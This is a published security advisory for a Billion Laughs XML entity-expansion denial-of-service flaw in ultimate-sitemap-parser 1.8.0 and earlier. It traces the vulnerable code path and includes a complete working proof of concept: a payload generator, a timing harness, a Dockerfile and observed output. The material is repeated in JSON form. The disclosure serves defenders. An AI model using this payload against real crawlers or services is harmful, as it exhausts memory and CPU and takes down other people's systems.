GHSA-P5WC-9W9R-M232

Vulnerability from github – Published: 2026-06-19 21:15 – Updated: 2026-06-19 21:15
VLAI
Summary
Ultimate Sitemap Parser (USP): XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser
Details

XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser

Summary

ultimate-sitemap-parser version 1.8.0 and earlier parse attacker-controlled XML content using Python's xml.parsers.expat without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the "Billion Laughs" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required — the vulnerability is exploitable by default through any public-facing use of sitemap_tree_for_homepage() or sitemap_from_str().

Details

The vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:

  1. usp/tree.py:42sitemap_tree_for_homepage(homepage_url) is the primary public entry point.
  2. usp/tree.py:133sitemap_from_str(content) is the secondary public entry point (also directly reachable from user code).
  3. usp/fetch_parse.py:141-145SitemapFetcher._fetch() retrieves the remote URL content.
  4. usp/fetch_parse.py:175 — The raw response becomes response_content (taint propagation point).
  5. usp/fetch_parse.py:441-450XMLSitemapParser.sitemap() creates an Expat parser and feeds the attacker-controlled content directly to it:
# usp/fetch_parse.py:441-450  — VULNERABLE SINK
parser = xml.parsers.expat.ParserCreate(
    namespace_separator=self.__XML_NAMESPACE_SEPARATOR
)
# ... handler assignments ...
parser.Parse(self._content, is_final)   # <-- no DTD/entity restriction

A full audit of the usp/ directory confirms that none of the following hardening measures are present: - defusedxml usage - DOCTYPE rejection - SetParamEntityParsing - UseForeignDTD - ExternalEntityRefHandler

When a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10⁶ expansions), processing time exceeds 20 seconds, effectively hanging the calling process.

PoC

Environment setup:

# Option A: install from PyPI
python -m venv /tmp/usp-poc
. /tmp/usp-poc/bin/activate
pip install ultimate-sitemap-parser==1.8.0
# Option B: Docker (using the provided Dockerfile)
docker build -t vuln-001-usp -f vuln-001/Dockerfile .
docker run --rm vuln-001-usp

Attack payload and execution:

from usp.tree import sitemap_from_str
import time, signal

TIMEOUT = 20

class TimedOut(Exception): pass
def handler(s, f): raise TimedOut()

def build_payload(level):
    lines = ['<?xml version="1.0"?>', '<!DOCTYPE x [']
    lines.append(' <!ENTITY lol "lol">')
    for i in range(1, level + 1):
        prev = "lol" if i == 1 else f"lol{i-1}"
        expansion = "".join(f"&{prev};" for _ in range(10))
        lines.append(f' <!ENTITY lol{i} "{expansion}">')
    lines.append(']>')
    lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
    lines.append(f'  <url><loc>http://example.com/&lol{level};</loc></url>')
    lines.append('</urlset>')
    return "\n".join(lines)

for level in [3, 4, 5, 6]:
    signal.signal(signal.SIGALRM, handler)
    signal.alarm(TIMEOUT)
    t = time.perf_counter()
    try:
        result = sitemap_from_str(build_payload(level))
        elapsed = time.perf_counter() - t
        signal.alarm(0)
        pages = list(result.all_pages())
        url_len = len(pages[0].url) if pages else 0
        print(f"Level {level}: {elapsed:.4f}s  url_len={url_len:,}")
    except TimedOut:
        elapsed = time.perf_counter() - t
        signal.alarm(0)
        print(f"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed")

Expected output (observed during dynamic reproduction):

Level 3 (10^3):   0.0054s   url_len=3,019
Level 4 (10^4):   0.0321s   url_len=30,019
Level 5 (10^5):   5.2845s   url_len=300,019
Level 6 (10^6):  TIMEOUT after 20.0011s  -- DoS confirmed

Processing time grows exponentially: level 5 is ~165× slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.

Impact

This is a Denial-of-Service (DoS) vulnerability via XML Entity Expansion (the "Billion Laughs" / CWE-776 pattern). Any application or service that uses ultimate-sitemap-parser to crawl external or user-supplied URLs is impacted.

Who is affected: - Web crawlers and indexers that call sitemap_tree_for_homepage() against arbitrary URLs — a single malicious sitemap server can lock up the crawler process. - CI/CD pipelines and monitoring tools that periodically parse sitemaps as part of automated workflows. - Any application that passes unvalidated user input to sitemap_from_str().

Because no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.

Reproduction artifacts

Dockerfile

FROM python:3.11-slim

LABEL description="VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC" \
      target="GateNLP/ultimate-sitemap-parser <= 1.8.0" \
      cwe="CWE-776"

WORKDIR /app

# Copy the cloned repository first
COPY repo/ /app/repo/

# Install uv_build (required build backend) then install the vulnerable package from the local clone
RUN pip install --no-cache-dir "uv_build>=0.9.6,<0.10.0" && \
    pip install --no-cache-dir /app/repo/

# Copy the PoC script
COPY vuln-001/poc.py /app/poc.py

CMD ["python3", "-u", "/app/poc.py"]

poc.py

#!/usr/bin/env python3
"""
PoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS
Affected: GateNLP/ultimate-sitemap-parser <= 1.8.0
CWE-776: Improper Restriction of Recursive Entity References in DTDs
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)

Sink: usp/fetch_parse.py:450
  parser = xml.parsers.expat.ParserCreate(namespace_separator=...)
  parser.Parse(self._content, is_final)   <- no DTD/entity restriction

Entry: usp.tree.sitemap_from_str(content: str) -> AbstractSitemap
"""

import signal
import sys
import time

from usp.tree import sitemap_from_str

TIMEOUT_SECONDS = 20
DOS_THRESHOLD_SECONDS = 2.0  # level 5 must exceed this to PASS


class TimedOut(Exception):
    pass


def _alarm_handler(signum, frame):
    raise TimedOut("SIGALRM fired")


def build_billion_laughs_payload(level: int) -> str:
    """Build a Billion Laughs XML payload nested to `level` depth.

    Each level multiplies expansion by 10:
      level 3 -> 10^3   = 1,000 chars
      level 4 -> 10^4   = 10,000 chars
      level 5 -> 10^5   = 100,000 chars
      level 6 -> 10^6   = 1,000,000 chars
    """
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE x ["]
    lines.append(' <!ENTITY lol "lol">')
    for i in range(1, level + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        expansion = "".join(f"&{prev};" for _ in range(10))
        lines.append(f' <!ENTITY lol{i} "{expansion}">')
    lines.append("]>")
    lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
    lines.append(f"  <url><loc>http://example.com/&lol{level};</loc></url>")
    lines.append("</urlset>")
    return "\n".join(lines)


def parse_with_timeout(payload: str):
    """Parse payload under SIGALRM watchdog; return (elapsed, url_len, timed_out)."""
    signal.signal(signal.SIGALRM, _alarm_handler)
    signal.alarm(TIMEOUT_SECONDS)
    start = time.perf_counter()
    timed_out = False
    url_len = 0
    try:
        result = sitemap_from_str(payload)
        elapsed = time.perf_counter() - start
        signal.alarm(0)
        pages = list(result.all_pages())
        if pages:
            url_len = len(pages[0].url)
    except TimedOut:
        elapsed = time.perf_counter() - start
        timed_out = True
        signal.alarm(0)
    except Exception as exc:
        elapsed = time.perf_counter() - start
        signal.alarm(0)
        print(f"    [EXCEPTION] {type(exc).__name__}: {exc}", flush=True)
    return elapsed, url_len, timed_out


def main() -> int:
    print("=" * 64)
    print("VULN-001  XML Entity Expansion DoS  (Billion Laughs)")
    print("Target : GateNLP/ultimate-sitemap-parser <= 1.8.0")
    print("Sink   : usp/fetch_parse.py:450  parser.Parse(_content)")
    print(f"Timeout: {TIMEOUT_SECONDS}s per level")
    print("=" * 64)

    results = {}
    for level in [3, 4, 5, 6]:
        theoretical = 10**level
        payload = build_billion_laughs_payload(level)
        print(
            f"\n[*] Level {level}: 10^{level} = {theoretical:>10,} chars  "
            f"payload_bytes={len(payload)}",
            flush=True,
        )
        elapsed, url_len, timed_out = parse_with_timeout(payload)
        results[level] = (elapsed, url_len, timed_out)

        if timed_out:
            print(
                f"[!] Level {level}: TIMED OUT after {elapsed:.1f}s  "
                f"(>{TIMEOUT_SECONDS}s)  -- DoS confirmed",
                flush=True,
            )
        else:
            print(
                f"[+] Level {level}: completed in {elapsed:.4f}s  "
                f"url_len={url_len:,}",
                flush=True,
            )

    print("\n" + "=" * 64)
    print("TIMING SUMMARY")
    print("=" * 64)
    for lvl, (elapsed, url_len, timed_out) in results.items():
        status = f"TIMEOUT >{TIMEOUT_SECONDS}s" if timed_out else f"{elapsed:.4f}s"
        print(f"  Level {lvl} (10^{lvl:>1}): {status:>20}   url_len={url_len:,}")

    print()

    # Verdict: level 5 must take >2s or level 6 must time out
    lvl5_elapsed, _, lvl5_timed_out = results.get(5, (0, 0, False))
    lvl6_elapsed, _, lvl6_timed_out = results.get(6, (0, 0, False))

    slow_evidence = lvl5_elapsed > DOS_THRESHOLD_SECONDS or lvl5_timed_out
    timeout_evidence = lvl6_timed_out or lvl6_elapsed > DOS_THRESHOLD_SECONDS

    if slow_evidence or timeout_evidence:
        print("[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion")
        print(
            f"       level-5 time={lvl5_elapsed:.4f}s  level-6 "
            + ("TIMEOUT" if lvl6_timed_out else f"time={lvl6_elapsed:.4f}s")
        )
        print("[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser <= 1.8.0")
        return 0
    else:
        print("[FAIL] Timing did not show significant slowdown -- DoS not confirmed")
        print(f"       level-5={lvl5_elapsed:.4f}s  level-6={lvl6_elapsed:.4f}s")
        print("       (expected level-5 > 2s or level-6 to time out)")
        return 1


if __name__ == "__main__":
    sys.exit(main())
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.8.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "ultimate-sitemap-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:15:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser\n\n### Summary\n\n`ultimate-sitemap-parser` version 1.8.0 and earlier parse attacker-controlled XML content using Python\u0027s `xml.parsers.expat` without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the \"Billion Laughs\" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required \u2014 the vulnerability is exploitable by default through any public-facing use of `sitemap_tree_for_homepage()` or `sitemap_from_str()`.\n\n### Details\n\nThe vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:\n\n1. **`usp/tree.py:42`** \u2014 `sitemap_tree_for_homepage(homepage_url)` is the primary public entry point.\n2. **`usp/tree.py:133`** \u2014 `sitemap_from_str(content)` is the secondary public entry point (also directly reachable from user code).\n3. **`usp/fetch_parse.py:141-145`** \u2014 `SitemapFetcher._fetch()` retrieves the remote URL content.\n4. **`usp/fetch_parse.py:175`** \u2014 The raw response becomes `response_content` (taint propagation point).\n5. **`usp/fetch_parse.py:441-450`** \u2014 `XMLSitemapParser.sitemap()` creates an Expat parser and feeds the attacker-controlled content directly to it:\n\n```python\n# usp/fetch_parse.py:441-450  \u2014 VULNERABLE SINK\nparser = xml.parsers.expat.ParserCreate(\n    namespace_separator=self.__XML_NAMESPACE_SEPARATOR\n)\n# ... handler assignments ...\nparser.Parse(self._content, is_final)   # \u003c-- no DTD/entity restriction\n```\n\nA full audit of the `usp/` directory confirms that none of the following hardening measures are present:\n- `defusedxml` usage\n- DOCTYPE rejection\n- `SetParamEntityParsing`\n- `UseForeignDTD`\n- `ExternalEntityRefHandler`\n\nWhen a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10\u2076 expansions), processing time exceeds 20 seconds, effectively hanging the calling process.\n\n### PoC\n\n**Environment setup:**\n\n```bash\n# Option A: install from PyPI\npython -m venv /tmp/usp-poc\n. /tmp/usp-poc/bin/activate\npip install ultimate-sitemap-parser==1.8.0\n```\n\n```bash\n# Option B: Docker (using the provided Dockerfile)\ndocker build -t vuln-001-usp -f vuln-001/Dockerfile .\ndocker run --rm vuln-001-usp\n```\n\n**Attack payload and execution:**\n\n```python\nfrom usp.tree import sitemap_from_str\nimport time, signal\n\nTIMEOUT = 20\n\nclass TimedOut(Exception): pass\ndef handler(s, f): raise TimedOut()\n\ndef build_payload(level):\n    lines = [\u0027\u003c?xml version=\"1.0\"?\u003e\u0027, \u0027\u003c!DOCTYPE x [\u0027]\n    lines.append(\u0027 \u003c!ENTITY lol \"lol\"\u003e\u0027)\n    for i in range(1, level + 1):\n        prev = \"lol\" if i == 1 else f\"lol{i-1}\"\n        expansion = \"\".join(f\"\u0026{prev};\" for _ in range(10))\n        lines.append(f\u0027 \u003c!ENTITY lol{i} \"{expansion}\"\u003e\u0027)\n    lines.append(\u0027]\u003e\u0027)\n    lines.append(\u0027\u003curlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\u003e\u0027)\n    lines.append(f\u0027  \u003curl\u003e\u003cloc\u003ehttp://example.com/\u0026lol{level};\u003c/loc\u003e\u003c/url\u003e\u0027)\n    lines.append(\u0027\u003c/urlset\u003e\u0027)\n    return \"\\n\".join(lines)\n\nfor level in [3, 4, 5, 6]:\n    signal.signal(signal.SIGALRM, handler)\n    signal.alarm(TIMEOUT)\n    t = time.perf_counter()\n    try:\n        result = sitemap_from_str(build_payload(level))\n        elapsed = time.perf_counter() - t\n        signal.alarm(0)\n        pages = list(result.all_pages())\n        url_len = len(pages[0].url) if pages else 0\n        print(f\"Level {level}: {elapsed:.4f}s  url_len={url_len:,}\")\n    except TimedOut:\n        elapsed = time.perf_counter() - t\n        signal.alarm(0)\n        print(f\"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed\")\n```\n\n**Expected output (observed during dynamic reproduction):**\n\n```\nLevel 3 (10^3):   0.0054s   url_len=3,019\nLevel 4 (10^4):   0.0321s   url_len=30,019\nLevel 5 (10^5):   5.2845s   url_len=300,019\nLevel 6 (10^6):  TIMEOUT after 20.0011s  -- DoS confirmed\n```\n\nProcessing time grows exponentially: level 5 is ~165\u00d7 slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.\n\n### Impact\n\nThis is a **Denial-of-Service (DoS)** vulnerability via XML Entity Expansion (the \"Billion Laughs\" / CWE-776 pattern). Any application or service that uses `ultimate-sitemap-parser` to crawl external or user-supplied URLs is impacted.\n\n**Who is affected:**\n- **Web crawlers and indexers** that call `sitemap_tree_for_homepage()` against arbitrary URLs \u2014 a single malicious sitemap server can lock up the crawler process.\n- **CI/CD pipelines and monitoring tools** that periodically parse sitemaps as part of automated workflows.\n- **Any application** that passes unvalidated user input to `sitemap_from_str()`.\n\nBecause no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\nFROM python:3.11-slim\n\nLABEL description=\"VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC\" \\\n      target=\"GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\" \\\n      cwe=\"CWE-776\"\n\nWORKDIR /app\n\n# Copy the cloned repository first\nCOPY repo/ /app/repo/\n\n# Install uv_build (required build backend) then install the vulnerable package from the local clone\nRUN pip install --no-cache-dir \"uv_build\u003e=0.9.6,\u003c0.10.0\" \u0026\u0026 \\\n    pip install --no-cache-dir /app/repo/\n\n# Copy the PoC script\nCOPY vuln-001/poc.py /app/poc.py\n\nCMD [\"python3\", \"-u\", \"/app/poc.py\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS\nAffected: GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\nCWE-776: Improper Restriction of Recursive Entity References in DTDs\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)\n\nSink: usp/fetch_parse.py:450\n  parser = xml.parsers.expat.ParserCreate(namespace_separator=...)\n  parser.Parse(self._content, is_final)   \u003c- no DTD/entity restriction\n\nEntry: usp.tree.sitemap_from_str(content: str) -\u003e AbstractSitemap\n\"\"\"\n\nimport signal\nimport sys\nimport time\n\nfrom usp.tree import sitemap_from_str\n\nTIMEOUT_SECONDS = 20\nDOS_THRESHOLD_SECONDS = 2.0  # level 5 must exceed this to PASS\n\n\nclass TimedOut(Exception):\n    pass\n\n\ndef _alarm_handler(signum, frame):\n    raise TimedOut(\"SIGALRM fired\")\n\n\ndef build_billion_laughs_payload(level: int) -\u003e str:\n    \"\"\"Build a Billion Laughs XML payload nested to `level` depth.\n\n    Each level multiplies expansion by 10:\n      level 3 -\u003e 10^3   = 1,000 chars\n      level 4 -\u003e 10^4   = 10,000 chars\n      level 5 -\u003e 10^5   = 100,000 chars\n      level 6 -\u003e 10^6   = 1,000,000 chars\n    \"\"\"\n    lines = [\u0027\u003c?xml version=\"1.0\"?\u003e\u0027, \"\u003c!DOCTYPE x [\"]\n    lines.append(\u0027 \u003c!ENTITY lol \"lol\"\u003e\u0027)\n    for i in range(1, level + 1):\n        prev = \"lol\" if i == 1 else f\"lol{i - 1}\"\n        expansion = \"\".join(f\"\u0026{prev};\" for _ in range(10))\n        lines.append(f\u0027 \u003c!ENTITY lol{i} \"{expansion}\"\u003e\u0027)\n    lines.append(\"]\u003e\")\n    lines.append(\u0027\u003curlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\u003e\u0027)\n    lines.append(f\"  \u003curl\u003e\u003cloc\u003ehttp://example.com/\u0026lol{level};\u003c/loc\u003e\u003c/url\u003e\")\n    lines.append(\"\u003c/urlset\u003e\")\n    return \"\\n\".join(lines)\n\n\ndef parse_with_timeout(payload: str):\n    \"\"\"Parse payload under SIGALRM watchdog; return (elapsed, url_len, timed_out).\"\"\"\n    signal.signal(signal.SIGALRM, _alarm_handler)\n    signal.alarm(TIMEOUT_SECONDS)\n    start = time.perf_counter()\n    timed_out = False\n    url_len = 0\n    try:\n        result = sitemap_from_str(payload)\n        elapsed = time.perf_counter() - start\n        signal.alarm(0)\n        pages = list(result.all_pages())\n        if pages:\n            url_len = len(pages[0].url)\n    except TimedOut:\n        elapsed = time.perf_counter() - start\n        timed_out = True\n        signal.alarm(0)\n    except Exception as exc:\n        elapsed = time.perf_counter() - start\n        signal.alarm(0)\n        print(f\"    [EXCEPTION] {type(exc).__name__}: {exc}\", flush=True)\n    return elapsed, url_len, timed_out\n\n\ndef main() -\u003e int:\n    print(\"=\" * 64)\n    print(\"VULN-001  XML Entity Expansion DoS  (Billion Laughs)\")\n    print(\"Target : GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\")\n    print(\"Sink   : usp/fetch_parse.py:450  parser.Parse(_content)\")\n    print(f\"Timeout: {TIMEOUT_SECONDS}s per level\")\n    print(\"=\" * 64)\n\n    results = {}\n    for level in [3, 4, 5, 6]:\n        theoretical = 10**level\n        payload = build_billion_laughs_payload(level)\n        print(\n            f\"\\n[*] Level {level}: 10^{level} = {theoretical:\u003e10,} chars  \"\n            f\"payload_bytes={len(payload)}\",\n            flush=True,\n        )\n        elapsed, url_len, timed_out = parse_with_timeout(payload)\n        results[level] = (elapsed, url_len, timed_out)\n\n        if timed_out:\n            print(\n                f\"[!] Level {level}: TIMED OUT after {elapsed:.1f}s  \"\n                f\"(\u003e{TIMEOUT_SECONDS}s)  -- DoS confirmed\",\n                flush=True,\n            )\n        else:\n            print(\n                f\"[+] Level {level}: completed in {elapsed:.4f}s  \"\n                f\"url_len={url_len:,}\",\n                flush=True,\n            )\n\n    print(\"\\n\" + \"=\" * 64)\n    print(\"TIMING SUMMARY\")\n    print(\"=\" * 64)\n    for lvl, (elapsed, url_len, timed_out) in results.items():\n        status = f\"TIMEOUT \u003e{TIMEOUT_SECONDS}s\" if timed_out else f\"{elapsed:.4f}s\"\n        print(f\"  Level {lvl} (10^{lvl:\u003e1}): {status:\u003e20}   url_len={url_len:,}\")\n\n    print()\n\n    # Verdict: level 5 must take \u003e2s or level 6 must time out\n    lvl5_elapsed, _, lvl5_timed_out = results.get(5, (0, 0, False))\n    lvl6_elapsed, _, lvl6_timed_out = results.get(6, (0, 0, False))\n\n    slow_evidence = lvl5_elapsed \u003e DOS_THRESHOLD_SECONDS or lvl5_timed_out\n    timeout_evidence = lvl6_timed_out or lvl6_elapsed \u003e DOS_THRESHOLD_SECONDS\n\n    if slow_evidence or timeout_evidence:\n        print(\"[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion\")\n        print(\n            f\"       level-5 time={lvl5_elapsed:.4f}s  level-6 \"\n            + (\"TIMEOUT\" if lvl6_timed_out else f\"time={lvl6_elapsed:.4f}s\")\n        )\n        print(\"[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser \u003c= 1.8.0\")\n        return 0\n    else:\n        print(\"[FAIL] Timing did not show significant slowdown -- DoS not confirmed\")\n        print(f\"       level-5={lvl5_elapsed:.4f}s  level-6={lvl6_elapsed:.4f}s\")\n        print(\"       (expected level-5 \u003e 2s or level-6 to time out)\")\n        return 1\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```",
  "id": "GHSA-p5wc-9w9r-m232",
  "modified": "2026-06-19T21:15:36Z",
  "published": "2026-06-19T21:15:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/GateNLP/ultimate-sitemap-parser/security/advisories/GHSA-p5wc-9w9r-m232"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/GateNLP/ultimate-sitemap-parser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ultimate Sitemap Parser (USP): XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…